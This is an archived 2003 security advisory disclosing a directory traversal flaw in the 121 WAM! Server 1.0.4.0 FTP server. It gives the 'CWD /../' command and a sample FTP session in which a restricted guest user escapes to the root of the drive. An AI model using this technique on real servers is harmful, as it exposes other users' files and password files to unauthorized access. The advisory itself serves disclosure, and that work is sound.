home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / wam / wam1040.txt
Encoding:
Text File  |  2003-08-19  |  4.8 KB  |  146 lines
  1. Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0
  2.  
  3. Url: http://www.121software.com/121wam/server.asp
  4.  
  5. "Imagine if you could centralise the management of your FTP server farm and
  6. give customers additional database management capability."
  7.  
  8. "121 WAM! Server is a standard FTP server for Microsoft Windows. When used 
  9. in
  10. conjunction with 121 WAM! Client, it also provides your users with a
  11. complete solution to manage their online databases including Microsoft 
  12. Access,
  13. SQL Server and MySQL. 121 WAM! makes uploading, downloading and transferring
  14. data a simple drag and drop operation. 121 WAM! Server is the first FTP 
  15. server
  16. that supports database transfer functionality."
  17. - From the Vendor's Website
  18.  
  19. It is possible to leave the root directory assigned to a resitricted 
  20. username
  21. and download any file on the remote computer.
  22. This can include, but is not limited to, the files of other users, and
  23. password files on the main server.
  24.  
  25. Sending the command:
  26.  
  27. CWD ..
  28.  
  29. Will not change the directory, however:
  30.  
  31. CWD /../
  32.  
  33. Will allow a restricted user to 'hop' out of the pre-definied user root
  34. directory, and browse the hard drive.
  35.  
  36. Sample Session:
  37. ===============
  38. [ First I log in under 'guest', confined to directory 'c:\root' ]
  39.  
  40. Microsoft Windows XP [Version 5.1.2600]
  41. (C) Copyright 1985-2001 Microsoft Corp.
  42.  
  43. C:\WINDOWS\system32>ftp 82.35.22.2
  44. Connected to 82.35.22.2.
  45. 220- ***** ***** ***** *****
  46. 220- 121 WAM! Server Version 1. 0. 4. 0
  47. 220- Get 121 WAM! Client for extra functionalities
  48. 220- such as database operations
  49. 220- Check out http://www.121software.com
  50. 220- ***** ***** ***** *****
  51. 220 Welcome to 121 WAM! Server
  52. User (82.35.22.2:(none)): guest
  53. 331 User name okay, need password.
  54. Password:
  55. 230 User logged in, proceed.
  56. ftp> dir
  57. 200 Port command ok.
  58. 150 Ready to transfer data.
  59. drwx------   2 owner nogroup               0 May 21 13:46 repd
  60. -rwx------   1 owner nogroup           10462 May 17 21:13 help.htm
  61. -rwx------   1 owner nogroup           75264 May 18 14:39 ralf4.exe
  62. -rwx------   1 owner nogroup             805 May 17 16:20 README.txt
  63. -rwx------   1 owner nogroup             439 May 17 15:32 SETUP.bat
  64. drwx------   2 owner nogroup               0 Jun 05 23:32 conf
  65. drwx------   2 owner nogroup               0 Jun 06 00:11 docs
  66. drwx------   2 owner nogroup               0 Jun 18 23:20 images
  67. 226 File transfer complete.
  68. ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.
  69. ftp> cd ..
  70. 250 CWD command completed successfully.
  71. ftp> dir
  72. 200 Port command ok.
  73. 150 Ready to transfer data.
  74. drwx------   2 owner nogroup               0 May 21 13:46 repd
  75. -rwx------   1 owner nogroup           10462 May 17 21:13 help.htm
  76. -rwx------   1 owner nogroup           75264 May 18 14:39 ralf4.exe
  77. -rwx------   1 owner nogroup             805 May 17 16:20 README.txt
  78. -rwx------   1 owner nogroup             439 May 17 15:32 SETUP.bat
  79. drwx------   2 owner nogroup               0 Jun 05 23:32 conf
  80. drwx------   2 owner nogroup               0 Jun 06 00:11 docs
  81. drwx------   2 owner nogroup               0 Jun 18 23:20 images
  82. 226 File transfer complete.
  83. ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.
  84.  
  85. [ As you can see, a regular 'cd ..' won't allow me to leave my root dir. ]
  86.  
  87. ftp> cd /../
  88. 250 CWD command completed successfully.
  89. ftp> dir
  90. 200 Port command ok.
  91. 150 Ready to transfer data.
  92. drwx------   2 owner nogroup               0 May 10 16:18 WARM
  93. drwx------   2 owner nogroup               0 Jul 15  2002 WINDOWS
  94. drwx------   2 owner nogroup               0 Jul 15  2002 Documents and 
  95. Settings
  96. [snip ...]
  97. drwx------   2 owner nogroup               0 Jul 15  2002 Program Files
  98. -rwx------   1 owner nogroup               0 Jul 15  2002 CONFIG.SYS
  99. -r-x------   1 owner nogroup            5517 Jul 15  2002 CLDMA.LOG
  100. -rwx------   1 owner nogroup               0 Jul 31  2002 CONFIG.WIN
  101. drwx------   2 owner nogroup               0 Sep 28  2002 perlsetup
  102. [snip ...]
  103. drwx------   2 owner nogroup               0 Jul 24 20:48 cygwin
  104. -rwx------   1 owner nogroup          475136 Aug 29  2002 ASMEDIT
  105. -rwx------   1 owner nogroup           17091 Sep 02  2002 gddreleasetemp
  106. 226 File transfer complete.
  107. ftp: 17589 bytes received in 0.22Seconds 80.32Kbytes/sec.
  108. ftp>
  109.  
  110. [ However, the 'cd /../' command got me straight to 'c:\'! ]
  111.  
  112.  
  113. ======================================================================
  114.  
  115.  
  116. Operating system and servicepack level:
  117. Windows 9x/Me/NT Based
  118.  
  119.  
  120. Software:
  121. 121 WAM! Server 1.0.4.0 (Possibly previous versions)
  122.  
  123.  
  124. Under what circumstances the vulnerability was discovered:
  125. Under a vulnerability search.
  126.  
  127.  
  128. If the vendor has been notified:
  129. Yes, I think we can expect a patch some day soon :o)
  130.  
  131.  
  132. How to contact you for further information:
  133. I can always be reached at peter4020@hotmail.com
  134.  
  135.  
  136. Please credit this find to:
  137. Peter Winter-Smith
  138.  
  139.  
  140. Thank you for your time,
  141. -Peter
  142.  
  143. _________________________________________________________________
  144. Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile
  145.  
  146.